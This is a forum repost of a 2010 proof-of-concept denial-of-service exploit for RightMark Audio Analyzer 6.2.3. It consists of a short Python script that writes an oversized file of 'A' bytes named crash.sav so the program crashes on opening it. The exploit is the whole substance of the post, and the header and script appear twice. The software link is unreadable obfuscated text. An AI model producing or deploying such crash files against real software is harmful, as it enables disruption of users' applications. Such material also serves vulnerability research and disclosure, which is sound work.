-
-
[转帖]RightMark Audio Analyzer 6.2.3 Denial of Service Vulnerability
-
发表于: 2010-8-12 12:42 3581
-
# Exploit Title: RightMark Audio Analyzer 6.2.3 (.sav , .sac) DoS
# Date: 12 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: f36K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8G2M7r3c8G2N6$3&6D9L8$3q4V1M7#2)9J5k6h3&6W2N6q4)9J5c8Y4y4G2k6Y4c8%4j5i4u0W2i4K6u0r3M7X3W2Y4K9s2c8E0j5i4u0C8i4K6u0V1j5i4g2V1K9h3!0Q4x3X3c8S2L8X3q4D9P5i4A6W2M7W2)9#2k6U0u0Q4y4h3j5J5x3e0V1H3x3K6c8Q4x3X3g2Z5N6r3#2D9i4K6y4r3K9r3I4Q4x3@1c8Q4x3U0k6A6j5g2)9K6c8o6m8Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.
# Version: v6.2.3
# Tested on: Windows XP SP 2
# CVE : N / A
# Description : This is the latest version from the official website
#!/usr/bin/python
# Create the malicious .sav or .sac file and boom ! The program crashes ! DEADBEEF !
filename = "crash.sav"
junk = "\x41" * 5000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()
# Date: 12 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: f36K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8G2M7r3c8G2N6$3&6D9L8$3q4V1M7#2)9J5k6h3&6W2N6q4)9J5c8Y4y4G2k6Y4c8%4j5i4u0W2i4K6u0r3M7X3W2Y4K9s2c8E0j5i4u0C8i4K6u0V1j5i4g2V1K9h3!0Q4x3X3c8S2L8X3q4D9P5i4A6W2M7W2)9#2k6U0u0Q4y4h3j5J5x3e0V1H3x3K6c8Q4x3X3g2Z5N6r3#2D9i4K6y4r3K9r3I4Q4x3@1c8Q4x3U0k6A6j5g2)9K6c8o6m8Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.
# Version: v6.2.3
# Tested on: Windows XP SP 2
# CVE : N / A
# Description : This is the latest version from the official website
#!/usr/bin/python
# Create the malicious .sav or .sac file and boom ! The program crashes ! DEADBEEF !
filename = "crash.sav"
junk = "\x41" * 5000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()
[培训]传播安全知识、拓宽行业人脉——看雪讲师团队等你加入!
赞赏
他的文章
赞赏
雪币:
留言: